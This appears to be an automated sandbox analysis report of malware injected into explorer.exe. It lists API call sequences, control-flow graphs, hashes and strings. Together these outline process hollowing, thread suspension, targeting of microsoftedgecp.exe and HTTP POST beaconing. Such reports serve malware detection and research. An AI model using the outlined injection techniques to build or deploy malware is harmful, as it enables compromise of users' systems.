                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 009D255B
                            • CloseHandle.KERNEL32(00000000), ref: 009D2566
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                            • String ID:
                            • API String ID: 1467098526-0
                            • Opcode ID: 50b8d967649124b2f449b9c3d8ca319b0fc9ad1a716550bb8d704a4a251f5107
                            • Instruction ID: 6fc5722c1653ecee895f5d4d84b151a4c3e3bce50cf7e49dc9d0233adbeb4323
                            • Opcode Fuzzy Hash: 50b8d967649124b2f449b9c3d8ca319b0fc9ad1a716550bb8d704a4a251f5107
                            • Instruction Fuzzy Hash: A11156B149E201EFD7019F60EC4CB6EBBA8FF55702F04C52BF54192150D7348A85ABA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D1F4A Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 281 9d1f4a-9d1fa5 call 9d22b8 call 9d2861 call 9d27e2 call 9d2374 290 9d1fa7-9d1fbe 281->290 291 9d1fc0-9d1fcc 281->291 294 9d1fd0-9d1fd2 290->294 291->294 295 9d1fd8-9d200f RtlZeroMemory 294->295 296 9d22a6-9d22b5 call 9d2843 294->296 300 9d229e-9d22a5 295->300 301 9d2015-9d2030 295->301 300->296 302 9d2062-9d2074 301->302 303 9d2032-9d2043 call 9d22e5 301->303 310 9d2078-9d207a 302->310 308 9d2045-9d2054 303->308 309 9d2056 303->309 313 9d2058-9d2060 308->313 309->313 311 9d228b-9d2291 310->311 312 9d2080-9d20dc call 9d2731 310->312 316 9d229a 311->316 317 9d2293-9d2295 call 9d2843 311->317 321 9d2284 312->321 322 9d20e2-9d20e7 312->322 313->310 316->300 317->316 321->311 323 9d20e9-9d20fa 322->323 324 9d2101-9d212f call 9d2861 wsprintfW 322->324 323->324 327 9d2148-9d215f 324->327 328 9d2131-9d2133 324->328 333 9d219e-9d21b8 327->333 334 9d2161-9d2197 call 9d2861 wsprintfW 327->334 329 9d2134-9d2137 328->329 331 9d2139-9d213e 329->331 332 9d2142-9d2144 329->332 331->329 335 9d2140 331->335 332->327 339 9d21be-9d21d1 333->339 340 9d2261-9d2277 call 9d2843 333->340 334->333 335->327 339->340 344 9d21d7-9d21ed call 9d2861 339->344 347 9d2279-9d227b call 9d2843 340->347 348 9d2280 340->348 350 9d21ef-9d21fa 344->350 347->348 348->321 352 9d21fc-9d2209 call 9d2826 350->352 353 9d220e-9d2225 350->353 352->353 357 9d2229-9d2236 353->357 358 9d2227 353->358 357->350 359 9d2238-9d223c 357->359 358->357 360 9d223e 359->360 361 9d2256-9d225d call 9d2843 359->361 362 9d223e call 9d2815 360->362 361->340 364 9d2243-9d2250 RtlMoveMemory 362->364 364->361
                            APIs
                              • Part of subcall function 009D2861: GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                              • Part of subcall function 009D2861: RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                              • Part of subcall function 009D27E2: lstrlen.KERNEL32(009D40DA,?,00000000,00000000,009D1F86,772D81D0,009D40DA,00000000), ref: 009D27EA
                              • Part of subcall function 009D27E2: MultiByteToWideChar.KERNEL32(00000000,00000000,009D40DA,00000001,00000000,00000000), ref: 009D27FC
                              • Part of subcall function 009D2374: RtlZeroMemory.NTDLL(?,00000018), ref: 009D2386
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 009D1FE2
                            • wsprintfW.USER32 ref: 009D211B
                            • wsprintfW.USER32 ref: 009D2186
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 009D2250
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: e8b556d581b936cc2495ee0e3f42c3582490e128a9a09439cec98cca29136158
                            • Instruction ID: 63093a23fbf7d3670b996d302e971b0ecf4441305d2181b3a8519f056c7b5dd5
                            • Opcode Fuzzy Hash: e8b556d581b936cc2495ee0e3f42c3582490e128a9a09439cec98cca29136158
                            • Instruction Fuzzy Hash: 56A18B7164D305AFD3109FA8C885A2BBBE8FFD8341F10882EF995D3361DA70DA449B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D25AD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 366 9d25ad-9d25c9 OpenProcess 367 9d25cb-9d25da IsWow64Process 366->367 368 9d2600-9d2607 366->368 369 9d25dc-9d25ec IsWow64Process 367->369 370 9d25f7 367->370 371 9d25ee-9d25f5 369->371 372 9d25f9-9d25fa CloseHandle 369->372 370->372 371->372 372->368
                            APIs
                            • OpenProcess.KERNEL32(00000400,00000000,?,77296900,?,?,microsoftedgecp.exe,009D1287), ref: 009D25BF
                            • IsWow64Process.KERNEL32(000000FF,?), ref: 009D25D1
                            • IsWow64Process.KERNEL32(00000000,?), ref: 009D25E4
                            • CloseHandle.KERNEL32(00000000), ref: 009D25FA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Wow64$CloseHandleOpen
                            • String ID: microsoftedgecp.exe
                            • API String ID: 331459951-1475183003
                            • Opcode ID: 4aab45a8f416b5b1e11049b180f5741f727417f61291f15bb8b672c72f339d2b
                            • Instruction ID: 95fd1b2b5f62ea6d43132182baa421b697691cd3e03fd65422de274e9682a15d
                            • Opcode Fuzzy Hash: 4aab45a8f416b5b1e11049b180f5741f727417f61291f15bb8b672c72f339d2b
                            • Instruction Fuzzy Hash: 9EF0907199A318FF9B10CF90ED88CEE776CEB11252B54826BF90092240D7318F44F6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009D1B17 Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 421 9d1b17-9d1b2c 422 9d1b2e 421->422 423 9d1b60-9d1b68 421->423 424 9d1b30-9d1b5e RtlMoveMemory 422->424 425 9d1b6a-9d1b6f 423->425 426 9d1bc3-9d1bcb 423->426 424->423 424->424 429 9d1bbe-9d1bc1 425->429 427 9d1bcd-9d1bdf 426->427 428 9d1c0b 426->428 427->428 431 9d1be1-9d1bfe LdrProcessRelocationBlock 427->431 432 9d1c0d-9d1c12 428->432 429->426 430 9d1b71-9d1b84 LoadLibraryA 429->430 434 9d1b8a-9d1b8f 430->434 435 9d1c15-9d1c17 430->435 431->428 433 9d1c00-9d1c04 431->433 433->428 436 9d1c06-9d1c09 433->436 437 9d1bb6-9d1bb9 434->437 435->432 436->428 436->431 438 9d1bbb 437->438 439 9d1b91-9d1b95 437->439 438->429 440 9d1b9c-9d1b9f 439->440 441 9d1b97-9d1b9a 439->441 442 9d1ba1-9d1bab GetProcAddress 440->442 441->442 442->435 443 9d1bad-9d1bb3 442->443 443->437
                            APIs
                            • RtlMoveMemory.NTDLL(?,?,?), ref: 009D1B4E
                            • LoadLibraryA.KERNEL32(?,009D4434,00000000,00000000,772EF560,00000000,009D1910,?,?,?,00000001,?,00000000), ref: 009D1B76
                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 009D1BA3
                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 009D1BF4
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                            • String ID:
                            • API String ID: 3827878703-0
                            • Opcode ID: 774dbccb1e58efce6fe192005bc9165d4edb1e28c667af10e59210dfb87bb195
                            • Instruction ID: d324bd97c70f969ff51bf7eed2b25c3794ccaf6d4d840ff8db73f247ba6c1480
                            • Opcode Fuzzy Hash: 774dbccb1e58efce6fe192005bc9165d4edb1e28c667af10e59210dfb87bb195
                            • Instruction Fuzzy Hash: 3F31A376784216BBCB24CF29C984776B7E8EF05315B14856FE886C7300E735E885CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:8.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:9
                            Total number of Limit Nodes:2
                            execution_graph 761 f49fab 762 f49fd8 761->762 764 f49ff8 761->764 765 f4a048 762->765 769 f4a04d 765->769 766 f4a135 LoadLibraryA 766->769 767 f4a190 VirtualProtect VirtualProtect 768 f4a1e8 767->768 768->768 769->766 769->767 770 f4a185 769->770 770->764

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_00F42BF4 1 Function_00F42774 2 Function_00F41576 3 Function_00F41B70 4 Function_00F41E70 5 Function_00F42B70 31 Function_00F41838 5->31 46 Function_00F41A04 5->46 6 Function_00F430F0 12 Function_00F41860 6->12 23 Function_00F41C58 6->23 6->31 52 Function_00F41A88 6->52 54 Function_00F42508 6->54 7 Function_00F425FC 8 Function_00F418F8 9 Function_00F414F9 10 Function_00F42860 10->1 10->3 36 Function_00F42620 10->36 11 Function_00F41560 12->3 13 Function_00F424E0 14 Function_00F4156C 15 Function_00F418E8 16 Function_00F41254 17 Function_00F414D4 18 Function_00F41DD4 18->31 19 Function_00F42054 19->4 19->8 19->12 20 Function_00F418D0 19->20 26 Function_00F41F40 19->26 19->31 32 Function_00F41938 19->32 42 Function_00F42010 19->42 50 Function_00F4188C 19->50 21 Function_00F41D50 21->31 22 Function_00F4355C 22->3 22->6 22->22 22->31 35 Function_00F43220 22->35 24 Function_00F425C4 24->7 25 Function_00F44040 26->8 26->31 27 Function_00F44A41 28 Function_00F4A048 57 Function_00F4A00A 28->57 29 Function_00F41BB0 30 Function_00F414B2 33 Function_00F42CB8 33->12 33->31 37 Function_00F41D20 33->37 34 Function_00F445A7 35->3 35->10 35->29 35->31 35->32 40 Function_00F41C28 35->40 53 Function_00F41C08 35->53 38 Function_00F43020 38->3 45 Function_00F42E98 38->45 39 Function_00F41822 41 Function_00F49FAB 41->28 42->46 43 Function_00F4141D 44 Function_00F42418 44->12 44->19 44->31 45->0 45->5 45->18 45->33 45->46 55 Function_00F42E08 45->55 47 Function_00F41405 48 Function_00F41000 49 Function_00F42E80 50->31 51 Function_00F41508 54->13 54->20 54->24 55->12 55->15 55->21 55->44 56 Function_00F43088 56->3 56->45

                            Executed Functions

                            Function 00F4355C Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 118 f4355c-f4356c call f41b70 121 f43572-f435a5 call f41838 118->121 122 f435fc-f43601 118->122 126 f435a7 call f41838 121->126 127 f435d1-f435f6 NtUnmapViewOfSection 121->127 129 f435ac-f435c5 126->129 131 f43608-f43617 call f43220 127->131 132 f435f8-f435fa 127->132 129->127 138 f43621-f4362a 131->138 139 f43619-f4361c call f4355c 131->139 132->122 134 f43602-f43607 call f430f0 132->134 134->131 139->138
                            APIs
                            • NtUnmapViewOfSection.NTDLL ref: 00F435D8
                            Memory Dump Source
                            • Source File: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F41000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_f41000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: SectionUnmapView
                            • String ID:
                            • API String ID: 498011366-0
                            • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                            • Instruction ID: 30fcf116df5c33705d975b6b9cc33862961f4d87d838d39890eb7c4d24697fe8
                            • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                            • Instruction Fuzzy Hash: 19119430A15E095FFB58FBB8989D6793BA0FB54311F58012AAC19C76A1EA3D8A40D701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F43220 Relevance: 9.2, APIs: 6, Instructions: 241processstringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 f43220-f4325b call f41838 3 f43261-f43273 CreateToolhelp32Snapshot 0->3 4 f43549-f43554 SleepEx 3->4 5 f43279-f4328f Process32First 3->5 4->3 6 f43538-f4353a 5->6 7 f43294-f432ac lstrcmpi 6->7 8 f43540-f43543 FindCloseChangeNotification 6->8 9 f432b2-f432c6 7->9 10 f4348c-f43495 call f41bb0 7->10 8->4 9->10 16 f432cc-f432e0 9->16 14 f4352a-f43532 Process32Next 10->14 15 f4349b-f434a4 call f41c08 10->15 14->6 15->14 21 f434aa-f434b1 call f41c28 15->21 16->10 20 f432e6-f432fa 16->20 20->10 25 f43300-f43314 20->25 21->14 26 f434b3-f434c1 call f41b70 21->26 25->10 31 f4331a-f4332e 25->31 26->14 30 f434c3-f43525 call f41938 call f42860 call f41938 26->30 30->14 31->10 35 f43334-f43348 31->35 35->10 40 f4334e-f43362 35->40 40->10 43 f43368-f4337c 40->43 43->10 45 f43382-f43396 43->45 45->10 47 f4339c-f433b0 45->47 47->10 49 f433b6-f433ca 47->49 49->10 51 f433d0-f433e4 49->51 51->10 53 f433ea-f433fe 51->53 53->10 55 f43404-f43418 53->55 55->10 57 f4341a-f4342e 55->57 57->10 59 f43430-f43444 57->59 59->10 61 f43446-f4345a 59->61 61->10 63 f4345c-f43470 61->63 63->10 65 f43472-f43486 63->65 65->10 65->14
                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F41000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_f41000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSleepSnapshotToolhelp32lstrcmpi
                            • String ID:
                            • API String ID: 2313719238-0
                            • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                            • Instruction ID: ca19f809ca8be4555baf5b66556dbd525246b6fa8b4c0c286f6f7021d26c0895
                            • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                            • Instruction Fuzzy Hash: D88133316186098FE71AEF54EC58BEABBA1FB50750F54462AA443C7170EF78DA08DF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F4A048 Relevance: 4.7, APIs: 3, Instructions: 223memorylibraryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 67 f4a048-f4a04b 68 f4a055-f4a059 67->68 69 f4a065 68->69 70 f4a05b-f4a063 68->70 71 f4a067 69->71 72 f4a04d-f4a053 69->72 70->69 73 f4a06a-f4a071 71->73 72->68 75 f4a073-f4a07b 73->75 76 f4a07d 73->76 75->76 76->73 77 f4a07f-f4a082 76->77 78 f4a084-f4a092 77->78 79 f4a097-f4a0a4 77->79 80 f4a094-f4a095 78->80 81 f4a0ce-f4a0e9 78->81 89 f4a0a6-f4a0a8 79->89 90 f4a0be-f4a0cc call f4a00a 79->90 80->79 82 f4a11a-f4a11d 81->82 84 f4a122-f4a129 82->84 85 f4a11f-f4a120 82->85 88 f4a12f-f4a133 84->88 87 f4a101-f4a105 85->87 91 f4a107-f4a10a 87->91 92 f4a0eb-f4a0ee 87->92 93 f4a135-f4a14e LoadLibraryA 88->93 94 f4a190-f4a1e4 VirtualProtect * 2 88->94 95 f4a0ab-f4a0b2 89->95 90->68 91->84 96 f4a10c-f4a110 91->96 92->84 100 f4a0f0 92->100 99 f4a14f-f4a156 93->99 97 f4a1e8-f4a1ed 94->97 112 f4a0b4-f4a0ba 95->112 113 f4a0bc 95->113 101 f4a0f1-f4a0f5 96->101 102 f4a112-f4a119 96->102 97->97 103 f4a1ef-f4a1fe 97->103 99->88 105 f4a158 99->105 100->101 101->87 110 f4a0f7-f4a0f9 101->110 102->82 108 f4a164-f4a16c 105->108 109 f4a15a-f4a162 105->109 114 f4a16e-f4a17a 108->114 109->114 110->87 111 f4a0fb-f4a0ff 110->111 111->87 111->91 112->113 113->90 113->95 116 f4a185-f4a18f 114->116 117 f4a17c-f4a183 114->117 117->99
                            APIs
                            • LoadLibraryA.KERNELBASE ref: 00F4A147
                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 00F4A1BB
                            • VirtualProtect.KERNELBASE ref: 00F4A1D9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.507878444.0000000000F47000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F47000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_f47000_explorer.jbxd
                            Similarity
                            • API ID: ProtectVirtual$LibraryLoad
                            • String ID:
                            • API String ID: 895956442-0
                            • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                            • Instruction ID: 7b647932b82b77293684bd8df66873a4ab7a35ebac6e050c393798179ed0ff6d
                            • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                            • Instruction Fuzzy Hash: 2E51AC327D891D0BCB24AA3C9CC07F5BFC1E799335F18072AD88AC3284E959D8469783
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:3.3%
                            Dynamic/Decrypted Code Coverage:22.3%
                            Signature Coverage:7%
                            Total number of Nodes:914
                            Total number of Limit Nodes:18
                            execution_graph 7808 3aaab2 7809 3aaabf 7808->7809 7814 3a8d51 7809->7814 7812 3a8d51 __calloc_crt 58 API calls 7813 3aaaf2 7812->7813 7815 3a8d58 7814->7815 7817 3a8d93 7815->7817 7819 3a8d76 7815->7819 7820 3aaeb8 7815->7820 7817->7812 7817->7813 7819->7815 7819->7817 7828 3a8d18 Sleep 7819->7828 7821 3aaede 7820->7821 7822 3aaec3 7820->7822 7825 3aaeee RtlAllocateHeap 7821->7825 7826 3aaed4 7821->7826 7832 3aa6f5 RtlDecodePointer 7821->7832 7822->7821 7823 3aaecf 7822->7823 7829 3a9230 7823->7829 7825->7821 7825->7826 7826->7815 7828->7819 7834 3a7bbb GetLastError 7829->7834 7831 3a9235 7831->7826 7833 3aa708 7832->7833 7833->7821 7848 3a89de 7834->7848 7836 3a7bd0 7837 3a7c1e SetLastError 7836->7837 7838 3a8d51 __calloc_crt 55 API calls 7836->7838 7837->7831 7839 3a7be3 7838->7839 7839->7837 7851 3a89fd 7839->7851 7841 3a7bf7 7842 3a7bfd 7841->7842 7843 3a7c15 7841->7843 7854 3a7c2a 7842->7854 7864 3a8840 7843->7864 7846 3a7c05 GetCurrentThreadId 7846->7837 7847 3a7c1b 7847->7837 7849 3a89f1 7848->7849 7850 3a89f5 TlsGetValue 7848->7850 7849->7836 7850->7836 7852 3a8a17 TlsSetValue 7851->7852 7853 3a8a13 7851->7853 7852->7841 7853->7841 7855 3a7c36 __initptd 7854->7855 7870 3aa06e 7855->7870 7857 3a7c73 7877 3a7ccb 7857->7877 7860 3aa06e __lock 58 API calls 7861 3a7c94 ___addlocaleref 7860->7861 7880 3a7cd4 7861->7880 7863 3a7cbf __initptd 7863->7846 7865 3a8849 HeapFree 7864->7865 7866 3a8872 __dosmaperr 7864->7866 7865->7866 7867 3a885e 7865->7867 7866->7847 7868 3a9230 __cftof_l 56 API calls 7867->7868 7869 3a8864 GetLastError 7868->7869 7869->7866 7871 3aa07f 7870->7871 7872 3aa092 RtlEnterCriticalSection 7870->7872 7883 3aa0f6 7871->7883 7872->7857 7874 3aa085 7874->7872 7905 3a7f79 7874->7905 8106 3aa1d8 RtlLeaveCriticalSection 7877->8106 7879 3a7c8d 7879->7860 8107 3aa1d8 RtlLeaveCriticalSection 7880->8107 7882 3a7cdb 7882->7863 7884 3aa102 __initptd 7883->7884 7896 3aa121 7884->7896 7912 3aa1ed 7884->7912 7891 3aa14e 7895 3aa06e __lock 58 API calls 7891->7895 7892 3aa13f 7894 3a9230 __cftof_l 58 API calls 7892->7894 7897 3aa144 __initptd 7894->7897 7898 3aa155 7895->7898 7896->7897 7954 3a8d99 7896->7954 7897->7874 7899 3aa17a 7898->7899 7900 3aa162 7898->7900 7901 3a8840 _free 58 API calls 7899->7901 7960 3a8a1f 7900->7960 7903 3aa16e 7901->7903 7963 3aa196 7903->7963 7906 3aa1ed __FF_MSGBANNER 58 API calls 7905->7906 7907 3a7f81 7906->7907 7908 3aa24a __NMSG_WRITE 58 API calls 7907->7908 7909 3a7f89 7908->7909 8077 3a8028 7909->8077 7966 3ae05a 7912->7966 7914 3aa1f4 7915 3aa201 7914->7915 7916 3ae05a __NMSG_WRITE 58 API calls 7914->7916 7917 3aa24a __NMSG_WRITE 58 API calls 7915->7917 7919 3aa110 7915->7919 7916->7915 7918 3aa219 7917->7918 7920 3aa24a __NMSG_WRITE 58 API calls 7918->7920 7921 3aa24a 7919->7921 7920->7919 7922 3aa268 __NMSG_WRITE 7921->7922 7924 3ae05a __NMSG_WRITE 55 API calls 7922->7924 7950 3aa38f 7922->7950 7926 3aa27b 7924->7926 7925 3aa117 7951 3a7e56 7925->7951 7927 3aa394 GetStdHandle 7926->7927 7928 3ae05a __NMSG_WRITE 55 API calls 7926->7928 7931 3aa3a2 _strlen 7927->7931 7927->7950 7929 3aa28c 7928->7929 7929->7927 7930 3aa29e 7929->7930 7930->7950 7976 3ad330 7930->7976 7933 3aa3db WriteFile 7931->7933 7931->7950 7933->7950 7935 3aa2cb GetModuleFileNameW 7937 3aa2eb 7935->7937 7943 3aa2fb __NMSG_WRITE 7935->7943 7936 3aa3fc 8035 3a91d1 IsProcessorFeaturePresent 7936->8035 7939 3ad330 __NMSG_WRITE 55 API calls 7937->7939 7939->7943 7941 3aa341 7941->7936 7994 3ad2c4 7941->7994 7943->7936 7943->7941 7985 3ad3a5 7943->7985 7946 3ad2c4 __NMSG_WRITE 55 API calls 7947 3aa378 7946->7947 7947->7936 7948 3aa37f 7947->7948 8003 3ae09a RtlEncodePointer 7948->8003 8028 3aaf32 7950->8028 8055 3a7e22 GetModuleHandleExW 7951->8055 7957 3a8da7 7954->7957 7956 3a8dd9 7956->7891 7956->7892 7957->7956 7959 3a8dba 7957->7959 8058 3aad7b 7957->8058 7959->7956 7959->7957 8075 3a8d18 Sleep 7959->8075 7961 3a8a2f 7960->7961 7962 3a8a3c InitializeCriticalSectionAndSpinCount 7960->7962 7961->7903 7962->7903 8076 3aa1d8 RtlLeaveCriticalSection 7963->8076 7965 3aa19d 7965->7897 7967 3ae064 7966->7967 7968 3ae06e 7967->7968 7969 3a9230 __cftof_l 58 API calls 7967->7969 7968->7914 7970 3ae08a 7969->7970 7973 3a91c1 7970->7973 7974 3a9196 __cftof_l 9 API calls 7973->7974 7975 3a91cd 7974->7975 7975->7914 7977 3ad33b 7976->7977 7978 3ad349 7976->7978 7977->7978 7980 3ad362 7977->7980 7979 3a9230 __cftof_l 58 API calls 7978->7979 7984 3ad353 7979->7984 7982 3aa2be 7980->7982 7983 3a9230 __cftof_l 58 API calls 7980->7983 7981 3a91c1 __cftof_l 9 API calls 7981->7982 7982->7935 7982->7936 7983->7984 7984->7981 7989 3ad3b3 7985->7989 7986 3ad3b7 7987 3ad3bc 7986->7987 7988 3a9230 __cftof_l 58 API calls 7986->7988 7987->7941 7990 3ad3e7 7988->7990 7989->7986 7989->7987 7992 3ad3f6 7989->7992 7991 3a91c1 __cftof_l 9 API calls 7990->7991 7991->7987 7992->7987 7993 3a9230 __cftof_l 58 API calls 7992->7993 7993->7990 7995 3ad2de 7994->7995 7997 3ad2d0 7994->7997 7996 3a9230 __cftof_l 58 API calls 7995->7996 8002 3ad2e8 7996->8002 7997->7995 8000 3ad30a 7997->8000 7998 3a91c1 __cftof_l 9 API calls 7999 3aa361 7998->7999 7999->7936 7999->7946 8000->7999 8001 3a9230 __cftof_l 58 API calls 8000->8001 8001->8002 8002->7998 8004 3ae0ce ___crtIsPackagedApp 8003->8004 8005 3ae18d IsDebuggerPresent 8004->8005 8006 3ae0dd LoadLibraryExW 8004->8006 8007 3ae1b2 8005->8007 8008 3ae197 8005->8008 8009 3ae11a GetProcAddress 8006->8009 8010 3ae0f4 GetLastError 8006->8010 8012 3ae1a5 8007->8012 8013 3ae1b7 RtlDecodePointer 8007->8013 8011 3ae19e OutputDebugStringW 8008->8011 8008->8012 8015 3ae12e 7 API calls 8009->8015 8016 3ae1aa 8009->8016 8014 3ae103 LoadLibraryExW 8010->8014 8010->8016 8011->8012 8012->8016 8021 3ae1de RtlDecodePointer RtlDecodePointer 8012->8021 8025 3ae1f6 8012->8025 8013->8016 8014->8009 8014->8016 8017 3ae18a 8015->8017 8018 3ae176 GetProcAddress RtlEncodePointer 8015->8018 8019 3aaf32 __cftof_l 6 API calls 8016->8019 8017->8005 8018->8017 8022 3ae27c 8019->8022 8020 3ae22e RtlDecodePointer 8023 3ae235 8020->8023 8027 3ae21a RtlDecodePointer 8020->8027 8021->8025 8022->7950 8026 3ae246 RtlDecodePointer 8023->8026 8023->8027 8025->8020 8025->8027 8026->8027 8027->8016 8029 3aaf3a 8028->8029 8030 3aaf3c IsProcessorFeaturePresent 8028->8030 8029->7925 8032 3acb8b 8030->8032 8041 3acb3a IsDebuggerPresent 8032->8041 8036 3a91dc 8035->8036 8047 3a9064 8036->8047 8040 3a91f7 8042 3acb4f ___raise_securityfailure 8041->8042 8043 3a8d3b ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 8042->8043 8045 3acb57 ___raise_securityfailure 8043->8045 8044 3a8d26 __invoke_watson GetCurrentProcess TerminateProcess 8046 3acb74 8044->8046 8045->8044 8046->7925 8048 3a907e ___raise_securityfailure _memset 8047->8048 8049 3a909e IsDebuggerPresent 8048->8049 8050 3a8d3b ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 8049->8050 8051 3a9162 ___raise_securityfailure 8050->8051 8052 3aaf32 __cftof_l 6 API calls 8051->8052 8053 3a9185 8052->8053 8054 3a8d26 GetCurrentProcess TerminateProcess 8053->8054 8054->8040 8056 3a7e3b GetProcAddress 8055->8056 8057 3a7e4d ExitProcess 8055->8057 8056->8057 8059 3aadf6 8058->8059 8065 3aad87 8058->8065 8060 3aa6f5 _malloc RtlDecodePointer 8059->8060 8061 3aadfc 8060->8061 8062 3a9230 __cftof_l 57 API calls 8061->8062 8074 3aadee 8062->8074 8063 3aa1ed __FF_MSGBANNER 57 API calls 8068 3aad92 8063->8068 8064 3aadba RtlAllocateHeap 8064->8065 8064->8074 8065->8064 8067 3aade2 8065->8067 8065->8068 8069 3aa6f5 _malloc RtlDecodePointer 8065->8069 8072 3aade0 8065->8072 8066 3aa24a __NMSG_WRITE 57 API calls 8066->8068 8070 3a9230 __cftof_l 57 API calls 8067->8070 8068->8063 8068->8065 8068->8066 8071 3a7e56 _malloc 3 API calls 8068->8071 8069->8065 8070->8072 8071->8068 8073 3a9230 __cftof_l 57 API calls 8072->8073 8073->8074 8074->7957 8075->7959 8076->7965 8080 3a80de 8077->8080 8079 3a7f94 8081 3a80ea __initptd 8080->8081 8082 3aa06e __lock 51 API calls 8081->8082 8083 3a80f1 8082->8083 8085 3a811f RtlDecodePointer 8083->8085 8087 3a81aa __cinit 8083->8087 8085->8087 8088 3a8136 RtlDecodePointer 8085->8088 8100 3a81f8 8087->8100 8093 3a8146 8088->8093 8089 3a8207 __initptd 8089->8079 8091 3a8153 RtlEncodePointer 8091->8093 8092 3a81ef 8094 3a7e56 _malloc 3 API calls 8092->8094 8093->8087 8093->8091 8095 3a8163 RtlDecodePointer RtlEncodePointer 8093->8095 8096 3a81f8 8094->8096 8098 3a8175 RtlDecodePointer RtlDecodePointer 8095->8098 8097 3a8205 8096->8097 8105 3aa1d8 RtlLeaveCriticalSection 8096->8105 8097->8079 8098->8093 8101 3a81fe 8100->8101 8102 3a81d8 8100->8102 8103 3aa1d8 _doexit RtlLeaveCriticalSection 8101->8103 8102->8089 8104 3aa1d8 RtlLeaveCriticalSection 8102->8104 8103->8102 8104->8092 8105->8097 8106->7879 8107->7882 7804 3c5a1c 7806 3c59c7 7804->7806 7805 3c5c40 VirtualProtect VirtualProtect 7807 3c5c09 7805->7807 7806->7805 7806->7807 8108 3a76e1 8109 3a76ea 8108->8109 8110 3a76ef 8108->8110 8126 3a8878 8109->8126 8114 3a7704 8110->8114 8113 3a76fd 8116 3a7710 __initptd 8114->8116 8115 3a775e 8119 3a77bb __initptd 